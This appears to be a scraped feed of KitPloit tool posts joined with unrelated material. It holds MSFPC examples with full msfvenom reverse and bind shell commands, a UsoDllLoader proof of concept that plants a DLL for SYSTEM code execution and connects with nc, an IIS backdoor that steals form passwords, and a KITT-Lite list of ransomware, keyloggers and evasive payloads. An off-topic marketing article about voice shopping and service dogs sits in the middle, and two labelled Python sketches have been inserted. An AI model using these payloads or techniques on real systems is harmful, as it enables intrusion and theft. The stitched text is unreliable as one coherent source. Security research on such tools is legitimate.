Channel: KitPloit - PenTest Tools!

MSFPC - MSFvenom Payload Creator


A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

About
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and the ability to enter any argument in any order (in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MSFPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will NOT try to bypass any anti-virus solutions at any stage.


Install
  • Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.
  • Kali v1.x should work.
  • OSX 10.11+ should work.
  • Weakerth4n 6+ should work.
  • ...nothing else has been tested.
$ curl -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Kali-Linux
MSFPC is already packaged in Kali Rolling, so all you have to do is:
root@kali:~# apt install -y msfpc

Help

$ bash msfpc.sh -h -v
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP.
msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc.sh stageless cmd py https # Python, stageless command prompt.
msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP.
msfpc.sh help verbose # Help screen, with even more information.

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$

Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)
$ ./msfpc.sh elf bind eth0 4444 verbose
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 192.168.103.142
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/bind_tcp)
[i] SHELL: shell
[i] DIRECTION: bind
[i] STAGE: staged
[i] METHOD: tcp
[i] CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
--platform linux -a x86 -e generic/none LPORT=4444 \
> '/root/linux-shell-staged-bind-tcp-4444.elf'

[i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

[i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
[i] Size: 4.0K
[i] MD5: eed4623b765eea623f2e0206b63aad61
[i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

[i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
[i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$

Example #3 (Python Format, Interactive IP Menu)
$ msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.103.142
[i] 2.) lo - 127.0.0.1
[i] 3.) wan - 31.204.154.174
[?] Select 1-3, interface or IP address: 1

[i] IP: 192.168.103.142
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \
--platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'

[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$
Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)
$ ./msfpc.sh loop wan
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Loop Mode. Creating one of each TYPE, with default values

[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: xxx.xxx.xxx.xxx
[i] PORT: 443
[i] TYPE: android (android/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p android/meterpreter/reverse_tcp \
LHOST=xxx.xxx.xxx.xxx LPORT=443 \
> '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

[i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

[i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
[i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!


[*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

[*] Done!

$
Note: Removed WAN IP.


To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)



Basecrack - Best Decoder Tool For Base Encoding Schemes


BaseCrack is a tool written in Python that can decode all alphanumeric base encoding schemes. This tool can accept single user input, multiple inputs from a file, input from argument, multi-encoded bases and decode them incredibly fast.
Decode Base16, Base32, Base36, Base58, Base62, Base64, Base64Url, Base85, Base91, Base92 and more with the best base encoding scheme decoding tool in town. It's useful for CTFs, Bug Bounty Hunting, and Cryptography.
What's new in v1.1: I heard your feature requests, now you can generate a wordlist/output with the decoded bases! :)

What's new in v2.0:
Now BaseCrack supports both Python2 and Python3

Magic Mode
Now you can decode multi-encoded bases of any pattern in a single shot.
Have you ever stumbled upon that one lame CTF challenge that gives you an encoded string which is just encoded over and over with Base64, Base91, Base85 and so on? Just give that to BaseCrack and you're done with it! ;)


Want to test it out? Just give it this input:
IX(Fp@nNG6ef<,*TFE]IT^zdINAb9EVbp,e<u=O6nN)/u+MTnU;Fo#VvQ&cK;mLZI#Jbdook<O{W#+gY%ooe#6pTkTa.9YPU8Uc=pl9BhSM9%kISw2k:8..u/6F2BwNndPZ2o#7NHNP3g,HlZu><*[Nv+T8
and see for yourself! :)
API: BaseCrack can now be used as a library! Just import the BaseCrack() class and call the decode() function. See example below.

Supported Encoding Schemes
  • Base16
  • Base32
  • Base36
  • Base58
  • Base62
  • Base64
  • Base64Url
  • Base85
  • Base91
  • Base92

Main Features
  • Can decode multi-encoded bases of any pattern.
  • Can decode multiple base encodings from a file.
  • Generate a wordlist/output with the decoded bases.
  • Predicts the type of encoding scheme.


Installation
$ git clone https://github.com/mufeedvh/basecrack.git
$ cd basecrack
$ pip install -r requirements.txt
$ python basecrack.py -h

Usage
To decode a single base encoding from user input:
python basecrack.py
To decode a single base encoding from argument (-b/--base):
python basecrack.py -b SGVsbG8gV29ybGQh
To decode multiple base encodings from a file (-f/--file):
python basecrack.py -f file.txt
Magic Mode: To decode multi-encoded base of any pattern (-m/--magic):
python basecrack.py --magic
To generate a wordlist/output with the decoded bases (-o/--output):
python basecrack.py -f file.txt -o output-wordlist.txt
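
The layer-peeling idea behind Magic Mode, as an added example that is not BaseCrack's own code: it covers only the four encodings in Python's standard library (Base16, Base32, Base64, Base85), and the function names and the "printable ASCII" acceptance rule are assumptions made for this sketch.

```python
import base64
import binascii

# Decoders are tried from the most restrictive alphabet to the least, so a
# hex string is not mistaken for Base64 and Base64 is not mistaken for Base85.
DECODERS = [
    ("Base16", lambda data: base64.b16decode(data)),
    ("Base32", lambda data: base64.b32decode(data)),
    ("Base64", lambda data: base64.b64decode(data, validate=True)),
    ("Base85", lambda data: base64.b85decode(data)),
]

MAX_LAYERS = 20  # upper bound so hostile input cannot keep the loop running


def as_text(raw):
    """Return raw as str if it is non-empty printable ASCII, otherwise None."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def peel_one(text):
    """Remove one encoding layer; return (scheme, decoded) or None."""
    for name, decode in DECODERS:
        try:
            raw = decode(text.encode("ascii"))
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
        decoded = as_text(raw)
        if decoded is not None:
            return name, decoded
    return None


def peel_all(text):
    """Peel layers until nothing decodes to printable text any more."""
    chain = []
    for _ in range(MAX_LAYERS):
        step = peel_one(text)
        if step is None:
            break
        chain.append(step[0])
        text = step[1]
    return text, chain


# Constructed sample: "hello world" wrapped in Base64, then Base32, then Base16.
SAMPLE = base64.b16encode(
    base64.b32encode(base64.b64encode(b"hello world"))
).decode("ascii")

if __name__ == "__main__":
    plain, layers = peel_all(SAMPLE)
    print(" -> ".join(layers), "=>", plain)
```

The printable-text rule is a heuristic: short inputs can be valid in more than one alphabet, so the reported chain is a best guess to confirm by eye.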

API
Want to use BaseCrack as a library? We got you covered!
Just put basecrack in your project's folder and you're ready to go!
Example:
# import the BaseCrack class from basecrack.py
from basecrack import BaseCrack

# calling the api function decode() with the encoded base
result = BaseCrack().decode('c3BhZ2hldHRp')

# printing the output
"""
result is tuple where:
result[0] = DECODED STRING
result[1] = ENCODING SCHEME
"""
print('Decoded String: {}'.format(result[0]))
print('Encoding Scheme: {}'.format(result[1]))
Output:
Decoded String: spaghetti
Encoding Scheme: Base64
Time to integrate this into your automation tools! ;)


UsoDllLoader - Windows - Weaponizing Privileged File Writes With The Update Session Orchestrator Service


2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. This means that, although it still works on the mainstream version of Windows 10, you should expect it to be patched in the coming months.

Description
This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo), which was fixed by Microsoft starting from build version 1903.

TL;DR
Starting from Windows 10, Microsoft introduced the Update Session Orchestrator service. As a regular user, you can interact with this service using COM, and start an "update scan" (i.e. check whether updates are available) or start the download of pending updates for example. There is even an undocumented built-in tool called usoclient.exe, which serves that purpose.
From an attacker's standpoint, this service is interesting because it runs as NT AUTHORITY\System and it tries to load a non-existent DLL (windowscoredeviceinfo.dll) whenever an Update Session is created.
This means that, if we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of windowscoredeviceinfo.dll into C:\Windows\System32\ and then have it loaded by the USO service to get arbitrary code execution as NT AUTHORITY\System.
For more information:
Part 1 - https://itm4n.github.io/usodllloader-part1/
Part 2 - https://itm4n.github.io/usodllloader-part2/

Build the PoC

Content
This solution is composed of two projects: WindowsCoreDeviceInfo and UsoDllLoader.
  • WindowsCoreDeviceInfo
It provides a PoC DLL that will start a bind shell on port 1337 (localhost only), whenever the QueryDeviceInformation() function is called. That's the name of the function used by the USO workers.
  • UsoDllLoader (optional)
It's a stripped-down version of usoclient.exe. It can be run as a regular user to interact with the USO service and have it load windowscoredeviceinfo.dll. Then, it will try to connect to the bind shell. In case of errors, please read the "Known issues" section.

Build the solution
The solution is already preconfigured so compiling should be easy. I'm using Visual Studio 2019. It might not work with older versions.
  1. Select Release config and x64 architecture.
  2. Build solution.
  3. Output: the DLL .\x64\Release\WindowsCoreDeviceInfo.dll and the loader .\x64\Release\UsoDllLoader.exe.

Test

Usage 1 - UsoDllLoader
For testing purposes, you can:
  1. As an administrator, copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\.
  2. Use the loader as a regular user.
  3. Hopefully enjoy a shell as NT AUTHORITY\SYSTEM.

Usage 2 - UsoClient
If UsoDllLoader.exe fails, you can do the above manually.
  1. As an administrator, copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\.
  2. Use the command usoclient StartInteractiveScan as a regular user. Note that you won't get any feedback from the command.
  3. Download netcat for Windows and use the command nc.exe 127.0.0.1 1337 to connect to the bindshell.

Known issues
  • Pending updates
This method will probably fail if one or several updates are waiting to be installed, or if updates are being installed.
  • RPC errors
Depending on the version of Windows, UsoDllLoader.exe might fail with various error codes. I didn't investigate these issues too much. The reason for this is that it's only a PoC, which I developed for convenience. What matters the most is the DLL, not the loader. See "Usage 2" for more details.


IIS-Raid - A Native Backdoor Module For Microsoft IIS (Internet Information Services)


IIS-Raid is a native IIS module that abuses the extensibility of IIS to backdoor the web server and carry out custom actions defined by an attacker.

Documentation
When installed, IIS-Raid will process every request and method, check if the X-Password header exists and compare it against the hardcoded value. In case the value specified by the header doesn't match the password, the request will continue normally without giving any indications of the backdoor. If the header value matches the password, it will search for the communication header and extract its content. Additionally, it will base64 decode it, compare it against the predefined commands and process the instructions if any.
Four arguments are implemented on the script:
  • --url - The URL that will be used to communicate with the backdoor. [Required]
  • --password - The pre-shared password on the backdoor. [Required]
  • --header - The header to use for communication in case it was changed from the default one.
  • --method - Change the method to either GET or POST.
Some of the features that are currently implemented in this version are:
  • Interactive Command Execution - Allows the execution of commands and retrieve the output.
  • Shellcode Injection - Extend functionality by injecting custom shellcode.
  • Web Password Extractor - Extract passwords from Web Forms in clear-text.

Customisation
Before using and compiling the module, you need to change some of the options. To authenticate to the backdoor, the controller uses a pre-shared password with the module. As this is the only mechanism preventing someone else from accessing the backdoor, the default password must be changed.
Apart from the password, other backdoor options can be modified on the Functions.h file:


The COM_HEADER definition is the header name used to perform the communication between the backdoor and the controller. The PASS_FILE definition is the file path where the extracted credentials from the web forms will be saved. The PASSWORD definition is the password that will be used to authenticate to the backdoor.

More info
For more information refer to https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/




How AI and Voice Technology is Similar to a Service Dog


Can a more complex comparison be made? AI and voice assistance are similar to a seeing-eye dog. Throwing the duties of a service dog into the same court as technology is as outlandish as things get, even in the middle of an ever-shifting pandemic. But with retail software development services working toward a new shopping experience, those individuals who have impaired seeing capabilities could find some respite.

A Service Dog Helps Navigate Daily Life

Voice technology in retail software can help those who cannot see navigate a store or mall more easily. Interactive applications are available for download. All of these tools aid in the navigation of daily life, much like a service dog would. Although the service dog may not be able to tell you what price is on a tag or what color the shirt is, I’m sure the combination of retail software development services and a service dog is one unstoppable duo. 

Shopping Through Smart Home Devices

Smart home devices make life less stressful and seem easier to manage. Well, for people with vision impairments, the smart home device can be an easy way to shop. Internet retailers have adapted AI voice technology to be able to interact with users to add items to carts and easily purchase. Now, of course, our service dog can’t do that! 

Interactive Retail Software Offer Voice Services

What a service dog can do, and the smart home cannot, is make sure people are crossing the street safely or help them catch the train to the store. But once they’re in the store, new retail software development services can employ interactive mobile applications designed specifically for a mall or shopping establishment.
Voice assistance can help turn-by-turn through the store, right to the item the user is seeking. Though a user with vision difficulties may not be able to read a map, the AI voice assistance can make sure they arrive safely to the next store or restrooms, with the dog’s help too!

Shop Retailers From Website or Parking Lot

Large corporations are the few retailers offering such services, but it’s predicted that more and more companies will start to offer voice-assisted shopping directly from their websites or by a phone call in response to the new shopping style emerging post-pandemic.

A New Retail Experience

Shoppers are hesitant to head into stores after the pandemic took our world and made it its own. Retail software development services are adapting rapidly to the new change. Increasingly, AI voice software will help shoppers find in-store products just by calling from the parking lot.
Now, users who use a service dog can “browse” stores without even having to go in! Their dog is there, to help hail a ride or get on the bus, but now voice technology can assist shoppers who cannot see find the exact product in mind.
A service dog and a robot walked into a bar, what do you get? A really cool shopping experience! Retail software and dogs offer tremendous help to those people who are blind, and the future has only been accelerated by the world’s current affairs. Technology that helps more than hurts is always refreshing to see but until we see AI that can translate a dog’s thoughts (so they can shop for us!), we’ll never be satisfied.






KITT-Lite - Python-Based Pentesting CLI Tool


The KITT Penetration Testing Framework was developed as an open source solution for pentesters and programmers alike to compile the tools they use with what they know into an open source project. With KITT, users are able to easily access a list of commonly used tools to their profession which are all open to configuration in the source code.
UPDATE: Now Supporting Kali 2020.2!
If you want to check out the full GUI version of KITT its repo can be found here

Features

OSINT

Cracking

Phishing

Payloads
  • Evil-Droid - Android APK Payloading & Embedding Framework
  • Catchyou - Undetectable Win32 Payload Generator
  • Winspy - Windows Reverse Shell Generator w/ IP Poisoning
  • Evilreg - Windows .reg Reverse Shell Generator
  • Badlnk - Shortcut (.lnk) Reverse Shell Generator
  • Enigma - Multiplatform Payload Dropper
  • Avet_Fabric - Windows AV Evasive Payloads
  • Eviloffice - Injects Macro & DDE Code into Excel & Word Documents
  • Evilpdf - Embeds .exe Files into PDF Files
  • EvilDLL - DLL Reverse Shell Generator
  • DroidTracker - Android .APK Location Tracker
  • hmmcookies - Grabs Firefox, Chrome, and Opera Cookies

Keyloggers

Privilege Escalation/Exploitation
  • BIOS_UBTU_Rooter.sh - Custom Ubuntu usb boot exploit
  • LinEnum - Linux shell enumeration tool
  • Linux - Linux Exploits and Enumeration Scripts
  • Mimikatz_trunk - Windows post exploitation tool
  • mysql - MySQL exploits and enumeration scripts
  • passwd_backdoor.sh - Custom passwd/ backdoor exploit for post-exploitation
  • pspy - Process scanner for linux
  • windows-privesc-check - Windows PrivEsc Scripts
  • Windows-Privlege-Escalation - Windows PrivEsc Scripts
  • Chromepass - AV-Undetectable Chrome Login Extraction Tool (Local exec)
  • htbenum - Offline Local Enum Server (Mainly for HTB)
  • PeekABoo - Enables RDP Service (Only on WinRM Machines - Enabled by default on WinServer machines but not client machines)
  • firefox_decrypt - Mozilla Browser Saved Login Extractor
  • Powershell-reverse-tcp - Reverse TCP Powershell Payload w/ Obfuscation
  • Invoker - Post Windows Non-GUI Shell Utility
  • HiveJack - Windows SAM Dump Tool
  • Impacket - Python Network Protocol Tools
  • Win-Brute-Logon - Post Tool For Cracking User Passwords (XP -> 10)
  • Covermyass - Covers Your Tracks on UNIX Systems
  • Leviathan - System Audit Toolkit
  • ispy - EternalBlue/Bluekeep Scanner/Exploiter
  • NekoBotV1 - Auto Exploiter Tool
  • Gtfo - Unix Binary Search Tool
  • Grok-backdoor - Python-Based Backdoor with Ngrok Tunneling
  • Mimikatz - Windows password, hash, PIN, and kerberos ticket extraction tool

Ransomware
  • Hidden-cry - Windows AES 256 Bit Encrypter/Decrypter
  • CryDroid - Android Encrypter/Decrypter

Bots

Network Cracking
  • Airsuite-ng - Software suite w/ detector, packet sniffer, WEP and WPA/WPA2-PSK Cracker and analysis tool
  • Wash & Reaver - WPS Cracking tools
  • Wifite2 - Network Auditing Tool
  • Ettercap - MiTM Attack Suite
  • Airgeddon - Network Auditing Tool
  • WiFipumpkin3 - Network Cracking Framework
  • Wifijammer - Stationary or Mobile WiFi Jammer
  • PwnSTAR - Fake AP Tool Framework
  • HT-WPS - WPS Pin Extractor
  • Linset - WPA/WPA2 MiTM Attack Tool
  • PentBox - HoneyPot Setup Tool
  • Espionage - Packet Sniffer/ARP Spoofer
  • EvilNet - ARP Attacks, VLAN Attacks, MAC Flooding, etc.

IoT Exploitation
  • HomePwn - IoT Exploitation Framework
  • Spooftooph - BT Spoofing
  • BtVerifier - Rfcomm Channel Verifier
  • BlueScan - BT Port/MAC Scanner

Hardware Hacking
  • MouseJack - BT Keyboard and Mouse Hijacker
  • GPIO_CTL - Custom GPIO Controller for RPi
  • Brutal - RubberDucky Payload Generator

System Security
  • SysIntegrity - File MD5sum Integrity Analyzer
  • snort - Network Intrusion Detection System
  • ssh_port_randomizer - SSHD Port Randomizer
  • ssh rsa_key generator - RSA Key generator
  • proxy router - Traffic Proxy Router
  • ssh_encryption - Buffing SSHD Security Protocols
  • Fail2ban Configurations - Fail2ban Protocol Auditor
  • PTF - PenTesting Tool Installation Framework
  • ClamAV - CLI Virus/Malware Scanner
  • Wotop - Tunnels Internet Traffic Over HTTP
  • TorghostNG - Directs All Internet Traffic Through Tor Proxy

Getting Started
WARNING: KITT was developed and tested on Kali Linux for RPi, I have not added support for any other distro yet but plan to in the near future.
WARNING: Installation Takes About 20 Minutes To Finish!
To begin, run sudo ./setup.sh to install all necessary libraries and configure PATH usage. Simply follow all instructions in the installer.
If you want to only install the tools, run sudo ./catchup.sh

Usage
To begin the framework, type KITTlite and execute in terminal.

Legal Disclaimer
Usage of KITT-Lite and/or the tools installed with KITT-Lite for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Built With
  • RPi 3B+ - Micro-Computer Developed by the Raspberry Pi Foundation
  • Kali Linux - Pentesting OS Developed by Offensive Security
  • GitHub - This Website!


ShellGen - Reverse shell generator


This is a simple script that will generate a specific or all shellcodes for CTFs using the VPN IP address on tun0 (the IPv4).

INFORMATION
Update has been made from sys library to argparse library (done in version 0.8)

Usage
For help:
  • shellgen -h
  • shellgen --help
If you want to skip update and just get the reverse shell, add --no-update to your commands and it will skip it.
To update:
  • ./shellgen.py -u
  • ./shellgen.py --update
List shells available:
  • shellgen --shells
  • shellgen -ls
An example for using:
  • shellgen --lhost 10.10.12.3 --lport 1234 --shell netcat
To request an improvement or new feature:
  • Create an issue and mark as enhancement
For issues:
  • Create an issue and mark as bug


Behave - A Monitoring Browser Extension For Pages Acting As Bad Boys



A (Still in Development) monitoring browser extension for pages acting as bad boys.
NB: This is the code repository of the project, if you're looking for the packed extensions:
Firefox: https://addons.mozilla.org/en-US/firefox/addon/behave/
Chrome: https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/

Introduction.
Behave! monitors and warns if a web page performs any of the following actions:
  • Browser based Port Scan
  • Access to Private IPs
  • DNS Rebinding attacks to Private IPs
Here's Behave! pointing the finger to at.tack.er page in the logs:


Port Scan Monitoring
Behave! will alert the user if the number of ports or protocols used during a browser session exceeds a specific limit.
The limit is 20 by default, but it can be changed by the user via preferences.
Since Behave does not perform any DNS request,

Direct access to Private IPs Monitoring
Behave! will alert if a web page tries to directly access an IP belonging to any of the following blocks:
  • Loopback addresses IPv4 127.0.0.1/8
  • Loopback addresses IPv6 ::1/128
  • Private Networks IPv4 10.0.0.0/8 - 172.16.0.0/12 - 192.168.0.0/16
  • Unique Local Addresses IPv6 fc00::/7

DNS Resolution to Private IPs
If a malicious script instructs the browser to connect to an FQDN whose authoritative DNS resolves to a private IP, Behave! checks whether the resolved IP is private. However, the IP information of a resolved hostname is available only if the port is open.
Since Behave!, in order to prevent TOCTOU issues, does not perform any external DNS request, if the port is closed there will be no IP resolution available and therefore, no alert.

DNS Rebinding Bypasses
Behave! does not perform any direct DNS request, and the IP is taken from the intercepted response.
That means that it's not exposed to any TOCTOU attack like DNS Rebinding.

DNS Rebinding Monitoring
Behave! keeps track if a hostname is resolved with multiple IPs, and will alert if there's some mixing between public IPs and private ones.
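
The three checks described above (private-range access, hostnames whose resolutions mix public and private IPs, and the port limit of 20), sketched as an added example that is not Behave!'s own code. The class and function names, the event fields, and counting distinct ports per page are assumptions; the host names and addresses in the demo are constructed.

```python
import ipaddress
from collections import defaultdict

# The blocks listed in "Direct access to Private IPs Monitoring".
PRIVATE_BLOCKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "::1/128",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "fc00::/7",
)]
PORT_LIMIT = 20  # default limit stated in "Port Scan Monitoring"


def is_private(ip):
    """True if ip falls in one of the monitored loopback/private blocks."""
    addr = ipaddress.ip_address(ip)
    # An IPv4-mapped IPv6 address (::ffff:a.b.c.d) is judged by its IPv4 part.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr.version == net.version and addr in net
               for net in PRIVATE_BLOCKS)


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


class PageMonitor:
    def __init__(self, port_limit=PORT_LIMIT):
        self.port_limit = port_limit
        self.ports = defaultdict(set)      # page -> distinct ports contacted
        self.resolved = defaultdict(set)   # hostname -> IPs seen in responses
        self.alerted = set()               # (page, alert) already reported

    def observe(self, page, host, ip, port):
        """Record one answered request; ip comes from the intercepted
        response, not from a separate DNS lookup. Returns new alerts."""
        alerts = []
        self.ports[page].add(port)
        if is_ip_literal(host):
            if is_private(host.strip("[]")):
                alerts.append(("private-ip", host))
        else:
            self.resolved[host].add(ip)
            if is_private(ip):
                alerts.append(("dns-private", host))
            # Rebinding signal: the same name seen on public AND private IPs.
            if {is_private(a) for a in self.resolved[host]} == {True, False}:
                alerts.append(("rebinding", host))
        if len(self.ports[page]) > self.port_limit:
            alerts.append(("port-scan", page))
        fresh = [a for a in alerts if (page, a) not in self.alerted]
        self.alerted.update((page, a) for a in fresh)
        return fresh


def demo():
    """Replay constructed events for one page and collect the alerts."""
    page = "http://at.tack.er/"
    events = [
        ("rebind.example", "203.0.113.10", 8080),   # first answer: public
        ("rebind.example", "192.168.1.1", 8080),    # later answer: private
        ("10.0.0.5", "10.0.0.5", 80),               # direct private access
    ] + [("198.51.100.7", "198.51.100.7", p) for p in range(1000, 1020)]
    monitor = PageMonitor()
    found = []
    for host, ip, port in events:
        found.extend(monitor.observe(page, host, ip, port))
    return found


if __name__ == "__main__":
    for kind, subject in demo():
        print(kind, subject)
```

The block list is explicit rather than `ipaddress`'s `is_private` attribute, which also covers ranges the page does not list.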

Install
Behave! is available as packed extension on:
Firefox Extension: https://addons.mozilla.org/en-US/firefox/addon/behave/
Chrome Extension: https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/
However, if you would like to play a bit with the code you can:
  • Clone it OR download the zip and unzip
  • Open Google Chrome/Chromium and go to chrome://extensions
  • Activate Developer Mode
  • Push "Load Unpacked" and choose the Behave directory.
  • Enjoy Behave!

Wanna Test Behave! ?
See what happens when you go to one of the following:
Singularity of Origin DNS Rebinding Attack: http://rebind.it:8080/manager.html
JavaScript Port Scan: http://jsscan.sourceforge.net/jsscan2.html
Nota Bene: At the moment it won't alert if DNS Rebinding attack is performed on non private IPs such as: http://www.alf.nu/BrowserCacheAndDnsRebinding

Wanna Help?
You are welcome to help! Feel free to create an Issue or fork the project and make a PR.



Server Side Template Injection Payloads


Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
